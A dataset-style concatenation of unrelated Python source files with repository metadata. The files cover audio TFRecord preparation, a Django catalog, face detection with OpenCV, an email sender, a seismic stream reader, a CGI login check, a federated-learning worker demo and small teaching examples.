--input_audio_filepatterns=/path/to/wavs/*wav,/path/to/mp3s/*mp3 \
--output_tfrecord_path=/path/to/output.tfrecord \
--num_shards=10 \
--alsologtostderr
"""
from absl import app
from absl import flags
from ddsp.training.data_preparation.prepare_tfrecord_lib import prepare_tfrecord
import tensorflow.compat.v2 as tf
FLAGS = flags.FLAGS
flags.DEFINE_list('input_audio_filepatterns', [],
'List of filepatterns to glob for input audio files.')
flags.DEFINE_string(
'output_tfrecord_path', None,
'The prefix path to the output TFRecord. Shard numbers will be added to '
'actual path(s).')
flags.DEFINE_integer(
'num_shards', None,
'The number of shards to use for the TFRecord. If None, this number will '
'be determined automatically.')
flags.DEFINE_integer('sample_rate', 16000,
'The sample rate to use for the audio.')
flags.DEFINE_integer(
'frame_rate', 250,
'The frame rate to use for f0 and loudness features. If set to 0, '
'these features will not be computed.')
flags.DEFINE_float(
'example_secs', 4,
'The length of each example in seconds. Input audio will be split to this '
'length using a sliding window. If 0, each full piece of audio will be '
'used as an example.')
flags.DEFINE_float(
'sliding_window_hop_secs', 1,
'The hop size in seconds to use when splitting audio into constant-length '
'examples.')
flags.DEFINE_float(
'eval_split_fraction', 0.0,
'Fraction of the dataset to reserve for eval split. If set to 0, no eval '
'split is created.'
)
flags.DEFINE_float(
'coarse_chunk_secs', 20.0,
'Chunk size in seconds used to split the input audio files.')
flags.DEFINE_list(
'pipeline_options', '--runner=DirectRunner',
'A comma-separated list of command line arguments to be used as options '
'for the Beam Pipeline.')
def run():
input_audio_paths = []
for filepattern in FLAGS.input_audio_filepatterns:
input_audio_paths.extend(tf.io.gfile.glob(filepattern))
prepare_tfrecord(
input_audio_paths,
FLAGS.output_tfrecord_path,
num_shards=FLAGS.num_shards,
sample_rate=FLAGS.sample_rate,
frame_rate=FLAGS.frame_rate,
window_secs=FLAGS.example_secs,
hop_secs=FLAGS.sliding_window_hop_secs,
eval_split_fraction=FLAGS.eval_split_fraction,
coarse_chunk_secs=FLAGS.coarse_chunk_secs,
pipeline_options=FLAGS.pipeline_options)
def main(unused_argv):
"""From command line."""
run()
def console_entry_point():
"""From pip installed script."""
app.run(main)
if __name__ == '__main__':
console_entry_point()
|
[
"[email protected]"
] | |
3bbfd86396dc378104b0ad258757a4707150a004
|
fca6dcc1fbb1acc698ee21599c0a3f7abbff36b9
|
/5. Additional materials/contextmanager.py
|
be0d7a54b8a048f679459bf68601fefbcbc4423d
|
[] |
no_license
|
megaes/CGScripting
|
69b1a62aecd72e489a7535c36e1301c51df2b5e1
|
c7cc3a11c479e1a8e0ef9d17abeaa6e3804986f9
|
refs/heads/master
| 2021-09-21T19:26:57.914055 | 2018-08-30T17:35:32 | 2018-08-30T17:35:32 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 457 |
py
|
import time
"""The file will be closed automatically"""
with open('c:/file') as f:
print f.read()
"""This class can be used with a context manager: some actions will be done before and after the main action"""
class timer(object):
def __enter__(self):
self.t = time.time()
def __exit__(self, exc_type, exc_val, exc_tb):
print 'Time:', time.time() - self.t, 'seconds'
with timer():
for i in range(5000):
print i
|
[
"[email protected]"
] | |
0253f89a91fb0b17bcc6d9619da3aa727880d474
|
04d191ecce6071515d9ad97878289d101062cab7
|
/Contur.py
|
e3d87fc55518437b2aeba58cd8116a5dd64a6ffe
|
[] |
no_license
|
Alloyer/Physics
|
1133256014885f816f2311aca55dccf8eb435926
|
10f514420287931d31b31e9069326f552d54edea
|
refs/heads/main
| 2023-04-22T06:34:39.498362 | 2021-05-09T17:37:34 | 2021-05-09T17:37:34 | 365,811,377 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,226 |
py
|
from math import *
import matplotlib.pyplot as plt
import numpy as np
### CONSTANTS ###
c = 299792458 # m/s
k_B = 8.617333262 * pow(10, -5) # эВ * К^-1
m = 15.994915 # аем
T = 1000 # К
lambda_S0_CONST = 6.62 * pow(10, -6) # A
lambda_0_CONST = 792.23 # A
T_e = 10000 # K
N_e = pow(10, 16) # см^-3
#################
class Contur:
def Calculate_Freq_from_lambda(self, wave_lenght):
return pow(10, 8) / wave_lenght
# конструктор
def __init__(self, input_lambda_0, input_lambda_S0):
if(input_lambda_0 != None):
self.lambda_0 = input_lambda_0
else:
self.lambda_0 = lambda_0_CONST
if(input_lambda_S0 != None):
self.lambda_S0 = input_lambda_S0
else:
self.lambda_S0 = lambda_S0_CONST
self.HWHM_Doppler = (self.lambda_0 / c) * sqrt(2 * k_B * log(2) * T / m)
self.freq_HWHM_Doppler = self.Calculate_Freq_from_lambda(self.HWHM_Doppler)
self.HWHM_Stark = (self.lambda_S0 * pow(T_e / pow(10, 4), (1/3))) * (N_e / pow(10, 16))
self.freq_HWHM_Stark = self.Calculate_Freq_from_lambda(self.HWHM_Stark)
self.freq_Voigt = 0.5 * self.freq_HWHM_Stark + sqrt(1/4 * self.freq_HWHM_Stark**2 + self.freq_HWHM_Doppler**2)
self.C2 = self.freq_HWHM_Stark / self.freq_Voigt
self.C3 = 2 * pow(10, -4) * self.freq_Voigt * (1.065 + 0.447 * self.C2 + 0.058 * self.C2**2)
self.C1 = (1 - self.C2) / self.C3
self.C4 = self.C2 / self.C3
self.freq_0 = self.Calculate_Freq_from_lambda(self.lambda_0)
def Calculate_b_v(self, freq):
freq = freq - self.freq_0
D = abs(self.Calculate_Freq_from_lambda(self.lambda_0) - freq) / (2 * self.freq_Voigt)
D2 = pow(D, 2.25)
first = (self.C1 * exp(-2.882 * (D**2)))
second = (self.C4 / (1 + 4 * (D**2)))
third = ((0.016 * self.C4 * (1 - self.freq_HWHM_Stark / self.freq_Voigt)) * (exp(-0.4 * D2) - (1 / (1 + 0.1 * D2))))
b_v = 0.0001 * ( first + second + third)
return b_v
#функция "Нарисовать график" - считает и рисует
def Draw_Plot(self, From, To, Number_of_points = 100):
x_axes = np.linspace(From, To, Number_of_points) #1500000000000000
y_axes = np.array([self.Calculate_b_v(x) for x in x_axes])
fig, ax = plt.subplots() # будет 1 график, на нем:
ax.plot(x_axes, y_axes, color="blue", label="b_v(freq)") # функция y1(x), синий, надпись y(x)
ax.set_xlabel("freq") # подпись у горизонтальной оси х
ax.set_ylabel("I") # подпись у вертикальной оси y
# ax.set_ylim(pow(10, -16) * 3.465, pow(10, -16) * 3.466)
ax.legend() # показывать условные обозначения
plt.show()
|
[
"[email protected]"
] | |
69164bbea98c02532b7343c5e57bd6723e642a62
|
758ba574aa10ae67214a1116808e2f8e3ee43449
|
/prac_04/list_comprehensions.py
|
9b2e2ed38d21cfc986339f75d77a517cd5d99163
|
[] |
no_license
|
app-1/Practicals
|
d2d5bb44cec8c5516b6e1ec650db920d21d307ef
|
64e54e8ae299add47f8b3593d4cae8be098f81c7
|
refs/heads/master
| 2021-01-19T18:25:24.857704 | 2017-09-13T03:43:39 | 2017-09-13T03:43:39 | 101,135,228 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,175 |
py
|
"""
CP1404/CP5632 Practical
List comprehensions
"""
names = ["Bob", "Angel", "Jimi", "Alan", "Ada"]
full_names = ["Bob Martin", "Angel Harlem", "Jimi Hendrix", "Alan Turing",
"Ada Lovelace"]
# for loop that creates a new list containing the first letter of each name
first_initials = []
for name in names:
first_initials.append(name[0])
print(first_initials)
# list comprehension that does the same thing
first_initials = [name[0] for name in names]
print(first_initials)
# list comprehension that creates a list containing tuples of both initials
# splits each name and adds the first letter of each part to a tuple
full_initials = [(name.split()[0][0], name.split()[1][0]) for name in
full_names]
print(full_initials)
almost_numbers = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
# TODO: use a list comprehension to create a list of integers
# from this list of strings
numbers = [int(number) for number in almost_numbers]
print(numbers)
# TODO: use a list comprehension to create a list of all of the full_names
# in lowercase format
lowercase_full_names = [name.lower() for name in full_names]
print(lowercase_full_names)
|
[
"[email protected]"
] | |
62f8f6e45e2c8fa0b96b0ee822ef9e2ee1a0d83b
|
44a7b4879c1da661cc2e8aa51c7fcc24cfb0fd3b
|
/src/scs_core/osio/manager/user_manager.py
|
f14e3e70118f2019ef5dd083551e6ca93ec113de
|
[
"MIT"
] |
permissive
|
seoss/scs_core
|
21cd235c9630c68f651b9a8c88120ab98fe5f513
|
a813f85f86b6973fa77722a7d61cc93762ceba09
|
refs/heads/master
| 2021-08-08T08:09:56.905078 | 2020-04-16T19:46:52 | 2020-04-16T19:46:52 | 156,239,538 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,315 |
py
|
"""
Created on 21 Mar 2017
@author: Bruno Beloff ([email protected])
"""
from scs_core.osio.client.rest_client import RESTClient
from scs_core.osio.data.user import User
from scs_core.osio.data.user_metadata import UserMetadata
# --------------------------------------------------------------------------------------------------------------------
class UserManager(object):
"""
classdocs
"""
# ----------------------------------------------------------------------------------------------------------------
def __init__(self, http_client, api_key):
"""
Constructor
"""
self.__rest_client = RESTClient(http_client, api_key)
# ----------------------------------------------------------------------------------------------------------------
def find(self, user_id):
request_path = '/v1/users/' + user_id
# request...
self.__rest_client.connect()
try:
response_jdict = self.__rest_client.get(request_path)
except RuntimeError:
response_jdict = None
self.__rest_client.close()
user = User.construct_from_jdict(response_jdict)
return user
def find_public(self, user_id):
request_path = '/v1/public/users/' + user_id
# request...
self.__rest_client.connect()
try:
response_jdict = self.__rest_client.get(request_path)
except RuntimeError:
response_jdict = None
self.__rest_client.close()
user = UserMetadata.construct_from_jdict(response_jdict)
return user
def find_members_of_org(self, org_id):
pass
# ----------------------------------------------------------------------------------------------------------------
def update(self, user_id, user):
request_path = '/v1/users/' + user_id
# request...
self.__rest_client.connect()
try:
self.__rest_client.put(request_path, user.as_json())
finally:
self.__rest_client.close()
# ----------------------------------------------------------------------------------------------------------------
def __str__(self, *args, **kwargs):
return "UserManager:{rest_client:%s}" % self.__rest_client
|
[
"[email protected]"
] | |
f0314427b5fc397267fc0589358f06e65ed0710d
|
afa287d9c6e0a4e3a556fc23d444ad2130a05120
|
/HW07/generate.py
|
5d1d7820978a0970dbd51156692093e32221f37f
|
[] |
no_license
|
zhangzhy52/cs759-High-Performance-Computing
|
ef0270ded30070245294279e52b31f4e9f64f9d7
|
e1c2299607e140c1008852556f457eb984ad8eb7
|
refs/heads/master
| 2021-09-03T19:25:56.910529 | 2018-01-11T11:52:45 | 2018-01-11T11:52:45 | 109,479,190 | 3 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 429 |
py
|
import numpy as np
def arrToFile (filename, array):
nrows, ncols = array.shape
f = open(filename , 'w')
for i in range(nrows):
for j in range(ncols):
f.write (str(array[i,j]) + "\n")
f.close()
if __name__ == '__main__':
A = np.random.random_integers (-10, 10, size = (16,32))
b = np.random.random_integers( -10, 10, size= (32,1))
arrToFile ('inputA.inp', A)
arrToFile ('inputB.inp', b)
print(A[-1, :].dot(b))
|
[
"[email protected]"
] | |
8e1fb53a12cc8169be23e1cdcdc37884cdf551ec
|
a6cbc03780b5c390f4f8ce9063bd8a7f6d75e8aa
|
/mail2.py
|
1c0dfcd906c6beffc8d5efcafb1c822ea969e238
|
[] |
no_license
|
KimaruThagna/Email_and_Regex
|
5f825554bd17e56ff091a79187c5ab7a758960d9
|
c250e37d6e09f1a9c35fb6af873ff1c77707a8fd
|
refs/heads/master
| 2021-09-06T11:59:04.784389 | 2018-02-06T12:16:58 | 2018-02-06T12:16:58 | 110,789,925 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,992 |
py
|
#This example still uses gmail but this time includes an attachment
import os,smtplib
from email.mime.text import MIMEText
from email.encoders import encode_base64
from email.mime.multipart import MIMEMultipart
from tkinter.filedialog import askopenfilename
from email.mime.base import MIMEBase
# function that sends the email. Feed it with relevant parameters
def sendMail(sender,pwd,subject,body,receiver,q):
message=MIMEMultipart() # define the whole message as a mimemultipart and add releven
#metadata
message['Subject']=subject
message['From']=sender
message['To']=receiver
text=MIMEText(body)
message.attach(text)# attach the body or actual message to the message object
if q=='y':
file=askopenfilename()# create window which allows you to browse file system\
#and select file
data=open(file,'rb').read() # read file in binary mode
part=MIMEBase('application','octet-stream')
part.set_payload(data) # set the payload as the file read in binary mode
encode_base64(part) #encode the attachment to base64
part.add_header('Content-disposition','attachment; filename='+os.path.basename(file))
message.attach(part)
print('Connecting ...')
server=smtplib.SMTP('smtp.gmail.com',587) # setup email server
server.ehlo() # identify yourself to gmail client
server.starttls() # start transport layer security
server.ehlo() #re-identify yourself after encryption
server.login(sender,pwd) # login to sender account
print('Connected')
server.sendmail(sender,receiver,message.as_string()) # perform actual sending of mail
print('Mail Sent.')
server.quit()
#prompts
sender=input('Input Your email ')
receiver=input('Provide Recepient ')
pwd=input('Provide password ' )
subject=input('Mail Subject ')
body=input('Type your message ')
con=input('Do you want to send an attachment? Enter y for YES ')
#call method
sendMail(sender,pwd,subject,body,receiver,con)
|
[
"[email protected]"
] | |
2db16db5c0570084ec0dbb9abc064697f824fa90
|
f51aff57f826aeea1be21e2d0c03cce0adaadefc
|
/exp/utils/rand.py
|
70cd3809130978b9f18a56c77772c3f8afb2594d
|
[
"MIT"
] |
permissive
|
zv5dmjq5/vivit
|
0a26f8b61e6f00da75fce7a9bbc75b0185ffea76
|
a05f448d1badb2db42e724c80676ce7e309194d2
|
refs/heads/master
| 2023-07-12T06:36:10.627912 | 2021-08-26T12:02:59 | 2021-08-26T12:02:59 | 370,409,161 | 1 | 0 |
MIT
| 2021-08-10T12:58:27 | 2021-05-24T16:00:04 |
Python
|
UTF-8
|
Python
| false | false | 1,198 |
py
|
"""Utility functions to control random seeds."""
import torch
class temporary_seed:
"""Temporarily set PyTorch seed to a different value, then restore current value.
This has the effect that code inside this context does not influence the outer
loop's random generator state.
"""
def __init__(self, temp_seed):
self._temp_seed = temp_seed
def __enter__(self):
"""Store the current seed."""
self._old_state = torch.get_rng_state()
torch.manual_seed(self._temp_seed)
def __exit__(self, exc_type, exc_value, traceback):
"""Restore the old random generator state."""
torch.set_rng_state(self._old_state)
def test_temporary_seed():
"""Test if temporary_seed works as expected."""
torch.manual_seed(3)
num1 = torch.rand(1)
with temporary_seed(2):
num2 = torch.rand(1)
num3 = torch.rand(1)
torch.manual_seed(3)
num4 = torch.rand(1)
num5 = torch.rand(1)
torch.manual_seed(2)
num6 = torch.rand(1)
assert torch.allclose(num1, num4)
assert torch.allclose(num3, num5)
assert torch.allclose(num2, num6)
if __name__ == "__main__":
test_temporary_seed()
|
[
"Anonymous"
] |
Anonymous
|
a02fe7d684c93e479473a43170637acca1d3c53d
|
11db9251522c2c3850dee4495ee66e8a969b051d
|
/facedetectcam.py
|
59cd14e7a2ebbd537a03610d49278503724e7752
|
[] |
no_license
|
RayDragon/Opencv-Face
|
7b496797e15ac84b7315d367135b9d1b26d33242
|
b2b8ef7d2eedf68ebef6779b5bfb5704dee2b181
|
refs/heads/master
| 2021-07-18T16:33:50.860004 | 2017-10-25T02:05:54 | 2017-10-25T02:05:54 | 108,206,829 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 561 |
py
|
import cv2
camera = cv2.VideoCapture(0)
cascade = cv2.CascadeClassifier("FDM/haarcascade_frontalface_default.xml")
while True:
retval, pict = camera.read()
faces = cascade.detectMultiScale(pict,scaleFactor=1.1,minNeighbors=5,minSize=(30, 30),flags=cv2.CASCADE_SCALE_IMAGE)
for (x, y, w, h) in faces:
cv2.rectangle(pict, (x, y), (x + w, y + h), (0, 255, 0), 2)
cv2.imshow("Faces found", pict)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
# When everything done, release the capture
camera.release()
cv2.destroyAllWindows()
|
[
"[email protected]"
] | |
20a501ad1afd7a17f50785678b12fba3bf55851b
|
8f65f9232208921ec2645b11ec62e6b1b958e32e
|
/catalog/urls.py
|
94946ba9eb3fc834165642047fde1e9269b9d830
|
[] |
no_license
|
jdalzatec/Learning-Django
|
ca8a11c8a25841ed09b318e00ea8d7a1b0a586dc
|
e6ae2080fddb7bea1c4a7f3a24732d4896100592
|
refs/heads/master
| 2020-03-26T13:26:22.363870 | 2018-08-22T05:30:46 | 2018-08-22T05:30:46 | 144,939,145 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,164 |
py
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name="index"),
path('books', views.BookListView.as_view(), name="books"),
path('book/<int:pk>', views.BookDetailView.as_view(), name='book-detail'),
path('authors', views.AuthorListView.as_view(), name="authors"),
path('authors/<int:pk>', views.AuthorDetailView.as_view(), name="author-detail"),
path('mybooks/', views.LoanedBooksByUserListView.as_view(), name="my-borrowed"),
path('allborrowed/', views.LoanedBooksListView.as_view(), name="all-borrowed"),
path('book/<uuid:pk>/renew/', views.renew_book_librarian, name="renew-book-librarian"),
path('author/create/', views.AuthorCreate.as_view(), name="author-create"),
path('author/<int:pk>/update/', views.AuthorUpdate.as_view(), name="author-update"),
path('author/<int:pk>/delete/', views.AuthorDelete.as_view(), name="author-delete"),
path('book/create/', views.BookCreate.as_view(), name="book-create"),
path('book/<int:pk>/update/', views.BookUpdate.as_view(), name="book-update"),
path('book/<int:pk>/delete/', views.BookDelete.as_view(), name="book-delete"),
]
|
[
"[email protected]"
] | |
aeab9d49d772c2d77f897b4369b6a216e4f2c638
|
99a5f8d01c0219a1883bb4b06fd8c7c04a43b0ee
|
/src/main.py
|
bce9ba1b4b099c9ea3abe8d8fec0ef1bb8879b3a
|
[] |
no_license
|
ElenaCerezoSwing/kaggle_competiton
|
ec973a41a4091d66308a5471de4bf5a9dc9f671d
|
a3626ae6ae558e1b9d20d596903bef9b508107b3
|
refs/heads/master
| 2020-08-11T22:32:33.791285 | 2019-10-12T21:56:56 | 2019-10-12T21:56:56 | 214,640,072 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,551 |
py
|
from data_tasks import load_train_data, load_test_data, save_data, get_dataframe_copy
from cleaning import get_cleaner_data, get_random_forest_cleaner_data
from assign import assign_X_y, get_splitted_train_test, assign_y_to_submitted
from modelize import get_linear_regression_model, get_k_neighbors_model, get_ridge_model, get_sgd_model
from output_generator import linear_model_generator, k_neigh_model_generator, sgd_model_generator, ridge_model_generator, random_forest_model_generator
from standarize import get_standard_scaler
def main():
print('starting etl')
train = load_train_data()
train_normal = get_dataframe_copy(train)
test = load_test_data()
test_normal = get_dataframe_copy(test)
train_normal = get_cleaner_data(train_normal)
train_normal = train_normal.dropna()
test_mormal = get_cleaner_data(test_normal)
X_normal, y_normal = assign_X_y(train_normal)
linear_model_generator(X_normal, y_normal , test_mormal)
k_neigh_model_generator(X_normal, y_normal , test_mormal)
sgd_model_generator(X_normal, y_normal , test_mormal)
ridge_model_generator(X_normal, y_normal , test_mormal)
print('processing randomForest Model')
X, y = assign_X_y(train)
X_test = test
X_test = get_random_forest_cleaner_data(X_test)
X = get_random_forest_cleaner_data(X)
X_transform, X_test_transform = get_standard_scaler(X, X_test)
X_transform = X_transform.fillna(0)
X_test_transform = X_test_transform.fillna(0)
random_forest_model_generator(X_transform, y, X_test_transform)
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
878ddaf62f61de755b7fb4fef4624b7ecbf5a5d8
|
d442bfa7e1402c08ae15e9d1612fc6ed1d5b07b2
|
/detector/send_receive/test/njsp_tester2.py
|
bdfa36174868d485dd781638ae1406a87d09bc5c
|
[] |
no_license
|
alex0sunny/Detector
|
098a59720e567166fe8a4432d912beea19020a77
|
281a060d8435fbaf52f86fc9ff25725657215fc4
|
refs/heads/master
| 2022-08-08T20:39:20.337239 | 2022-08-04T07:53:34 | 2022-08-04T07:53:34 | 210,623,771 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,472 |
py
|
import logging
import numpy as np
from queue import Queue, Empty
from time import sleep
from matplotlib import pyplot
from obspy import Stream, Trace, UTCDateTime
from detector.send_receive.njsp.njsp import NJSP
show_signal = True
host = 'localhost'
port = 10012
station = 'NDYY'
sample_rate = init_packet = check_time = None
logpath = None
loglevel = logging.DEBUG
format = '%(levelname)s %(asctime)s %(funcName)s %(filename)s:%(lineno)d %(message)s'
logging.basicConfig(level=loglevel, filename=logpath, format=format)
logger = logging.getLogger('router')
logging.getLogger("matplotlib").setLevel(logging.WARNING)
logging.getLogger("gpsd").setLevel(logging.WARNING)
njsp = NJSP(logger=logger, log_level=logging.DEBUG)
njsp_params = {
'reconnect': True,
'reconnect_period': 10,
'bson': True,
'handshake': {
'subscriptions': ['status', 'log', 'streams', 'alarms'],
'flush_buffer': False,
'client_name': 'TRIG'
}
}
njsp_queue = Queue(100)
reader1 = njsp.add_reader(host, port, 'TRIG', njsp_params, njsp_queue)
# reader2 = njsp.add_reader('localhost', 10011, 'TRIG', njsp_params, njsp_queue)
while not njsp.is_alive(reader1):
logger.info(f'{reader1} connecting...')
sleep(1)
if show_signal:
pyplot.ion()
figure = pyplot.figure()
st = Stream()
while True:
try:
packets_data = njsp_queue.get(timeout=1)
except Empty:
logger.info('no data')
continue
for conn_name, dev_packets in packets_data.items():
for packet_type, content in dev_packets.items():
if 'streams' == packet_type and station in content and sample_rate:
for stream_name, stream_data in content.items():
if stream_name == station:
starttime = UTCDateTime(stream_data['timestamp'])
for ch_name, bytez in stream_data['samples'].items():
#stream_data['samples'][ch_name] = len(stream_data['samples'][ch_name])
if show_signal:
tr = Trace()
tr.stats.starttime = starttime
tr.stats.sampling_rate = sample_rate
tr.stats.channel = ch_name
tr.data = np.frombuffer(bytez, 'int')
st += tr
if not check_time:
check_time = starttime
if show_signal and starttime > check_time + 1:
check_time = starttime
st.sort().merge()
st.trim(starttime=st[0].stats.endtime - 10)
pyplot.clf()
st.plot(fig=figure)
pyplot.show()
pyplot.pause(.1)
logger.debug(f'stream content, streams:{list(content.keys())} sample_rate:{sample_rate}')
if packet_type == 'parameters' and station in content['streams']:
for stream in list(content['streams'].keys()):
if stream != station:
del content['streams'][stream]
init_packet = content
print('init_packet:', init_packet)
sample_rate = content['streams'][station]['sample_rate']
#logger.debug('packets:\n' + str(packets_data))
|
[
"[email protected]"
] | |
c41fbd8fb280c104bb9a6dbd7dccac03142c3685
|
91c314460f7fac42e1198b9fef2978bdadd3d214
|
/test_proj3/test_proj3/urls.py
|
26987996903456a63db0bf51e626d1de1a259cad
|
[] |
no_license
|
g-merrill/proj3-test-repo
|
f03d136fd695dddcb257cd9f636d9c7ed727ee9d
|
5e9235b7d55539e775fe07d87a60a91552195b9a
|
refs/heads/master
| 2020-07-23T18:41:47.575956 | 2019-09-10T22:33:37 | 2019-09-10T22:33:37 | 207,670,599 | 0 | 2 | null | 2019-09-10T22:33:38 | 2019-09-10T21:59:21 |
Python
|
UTF-8
|
Python
| false | false | 752 |
py
|
"""test_proj3 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
urlpatterns = [
path('admin/', admin.site.urls),
]
|
[
"[email protected]"
] | |
405861d4482cedf6d0dcaa32d21b8a8bff19a759
|
97de3ec78108f9380e78237b9a582f1fc697d199
|
/cgi-bin/login.py
|
8e0b0402c55a16b4317a81f60445d43e46f6409e
|
[] |
no_license
|
siddartha19/Login-Form
|
50706921c18987a9d996ba74f20b3bb90691b287
|
535915d859352c5be0bdc7b04be2fd242a374360
|
refs/heads/master
| 2020-03-31T21:18:13.298939 | 2019-02-05T14:34:45 | 2019-02-05T14:34:45 | 151,095,668 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 373 |
py
|
import cgi
import sqlite3
print("Content-type:text/html\r\n")
form = cgi.FieldStorage()
un= form.getvalue("un")
up = form.getvalue("pwd")
if un=="chandu" and up=="519":
print("<script>window.location.href='http://localhost:8000/test.html';</script>")
else:
#if un=="chandu":
# print("WRONG PASSWORD")
#else:
print("WRONG USERNAME")
cur.close()
con.close()
|
[
"[email protected]"
] | |
dafd4470eabf9ab2496e9006e235388f265a48d7
|
1a5db9481bdb6711af937a0ae647a2cf65d55191
|
/2020/Day 5/Part 1.py
|
effc15a669adbb54912ff838a2b252d1530e2b93
|
[] |
no_license
|
Danny213123/Advent-of-Coding
|
5ef76f71f998ea3f8e46d361fe073f2f2b2d6d77
|
0b7b1b6b6ae431dd5b341e871ec7749a9e370451
|
refs/heads/main
| 2023-01-29T00:06:06.822021 | 2020-12-14T13:46:43 | 2020-12-14T13:46:43 | 317,964,154 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 548 |
py
|
import math
rowid = 0
for x in range (945):
k = input()
row, col = 0, 0
min2, max2 = 0, 7
min, max = 0, 127
for y in range (len(k) - 3):
if (k[y] == "F"):
max = math.floor((max + min) / 2)
elif (k[y] == "B"):
min = math.ceil((max + min) / 2)
row = max
for d in range (len(k) - 3, len(k)):
if (k[d] == "L"):
max2 = math.floor((max2 + min2) / 2)
elif (k[d] == "R"):
min2 = math.ceil((max2 + min2) / 2)
col = max2
if ((row * 8) + col > rowid):
rowid = (row * 8) + col
print(rowid)
|
[
"[email protected]"
] | |
d5ab6e2c2301fa7c2de21056b961275cd20e463d
|
840b98f14f181f7dbd693f2ee4b3c46e5be59305
|
/demos/demo_pycloudmessenger/POM1/NeuralNetworks/pom1_NN_worker_pycloudmessenger.py
|
3bb1b70be16f54c7404843da2a380711222b695e
|
[
"Apache-2.0"
] |
permissive
|
Musketeer-H2020/MMLL-Robust
|
4ef6b2ff5dff18d4d2b2a403a89d9455ba861e2b
|
ccc0a7674a04ae0d00bedc38893b33184c5f68c6
|
refs/heads/main
| 2023-09-01T18:47:46.065297 | 2021-09-28T15:34:12 | 2021-09-28T15:34:12 | 386,264,004 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,786 |
py
|
# -*- coding: utf-8 -*-
'''
@author: Marcos Fernandez Diaz
November 2020
Example of use: python pom1_NN_worker_pycloudmessenger.py --user <user> --password <password> --task_name <task_name> --id <id>
Parameters:
- user: String with the name of the user. If the user does not exist in the pycloudmessenger platform a new one will be created
- password: String with the password
- task_name: String with the name of the task. If the task already exists, an error will be displayed
- id: Integer representing the partition of data to be used by the worker. Each worker should use a different partition, possible values are 0 to 4.
'''
# Import general modules
import argparse
import logging
import json
import numpy as np
import sys, os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # Disables tensorflow warnings
import tensorflow as tf
import onnxruntime
from sklearn.metrics import accuracy_score
# Add higher directory to python modules path.
sys.path.append("../../../../")
# To be imported from MMLL (pip installed)
from MMLL.nodes.WorkerNode import WorkerNode
from MMLL.comms.comms_pycloudmessenger import Comms_worker as Comms
# To be imported from demo_tools
from demo_tools.task_manager_pycloudmessenger import Task_Manager
from demo_tools.data_connectors.Load_from_file import Load_From_File as DC
from demo_tools.mylogging.logger_v1 import Logger
from demo_tools.evaluation_tools import display, plot_cm_seaborn, create_folders
# Set up logger
logging.basicConfig(
level=logging.ERROR,
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
LOGGER = logging.getLogger()
LOGGER.setLevel(logging.DEBUG)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--user', type=str, default=None, help='User')
parser.add_argument('--password', type=str, default=None, help='Password')
parser.add_argument('--task_name', type=str, default=None, help='Name of the task')
parser.add_argument('--id', type=int, default=None, choices=[0, 1, 2, 3, 4], help='The address of the worker')
FLAGS, unparsed = parser.parse_known_args()
user_name = FLAGS.user
user_password = FLAGS.password
task_name = FLAGS.task_name
data_partition_id = FLAGS.id # This integer identifies the data partition used for the worker
# Set basic configuration
dataset_name = 'mnist'
verbose = False
pom = 1
model_type = 'NN'
# Create the directories for storing relevant outputs if they do not exist
create_folders("./results/")
# Setting up the logger
logger = Logger('./results/logs/Worker_' + str(user_name) + '.log')
# Load the credentials for pycloudmessenger
display('===========================================', logger, verbose)
display('Creating Worker...', logger, verbose)
# Note: this part creates the worker (participant) and it joins the task. This code is
# intended to be used only at the demos, in Musketeer this part must be done in the client.
credentials_filename = '../../musketeer.json'
try:
with open(credentials_filename, 'r') as f:
credentials = json.load(f)
except:
display('Error - The file musketeer.json is not available, please put it under the following path: "' + os.path.abspath(os.path.join("","../../")) + '"', logger, verbose)
sys.exit()
# Create user and join task
tm = Task_Manager(credentials_filename)
participant = tm.create_worker_and_join_task(user_name, user_password, task_name, display, logger)
display("Worker %s has joined task %s" %(user_name, task_name), logger, verbose)
# Creating the comms object
display('Creating WorkerNode under POM %d, communicating through pycloudmessenger' %pom, logger, verbose)
comms = Comms(participant, user_name)
# Creating Workernode
wn = WorkerNode(pom, comms, logger, verbose)
display('-------------------- Loading dataset %s --------------------------' % dataset_name, logger, verbose)
# Load data
# Warning: this data connector is only designed for the demos. In Musketeer, appropriate data
# connectors must be provided
data_file = '../../../../input_data/' + dataset_name + '_demonstrator_data.pkl'
try:
dc = DC(data_file)
except:
display('Error - The file ' + dataset_name + '_demonstrator_data.pkl does not exist. Please download it from Box and put it under the following path: "' + os.path.abspath(os.path.join("","../../../../input_data/")) + '"', logger, verbose)
sys.exit()
# Get train/test data and set training data
[Xtr, ytr, _, _, Xtst, ytst] = dc.get_all_data_Worker(int(data_partition_id))
wn.set_training_data(dataset_name, Xtr, ytr)
display('WorkerNode loaded %d patterns for training' % wn.NPtr, logger, verbose)
# Creating a ML model and start training procedure
wn.create_model_worker(model_type)
display('MMLL model %s is ready for training!' %model_type, logger, verbose)
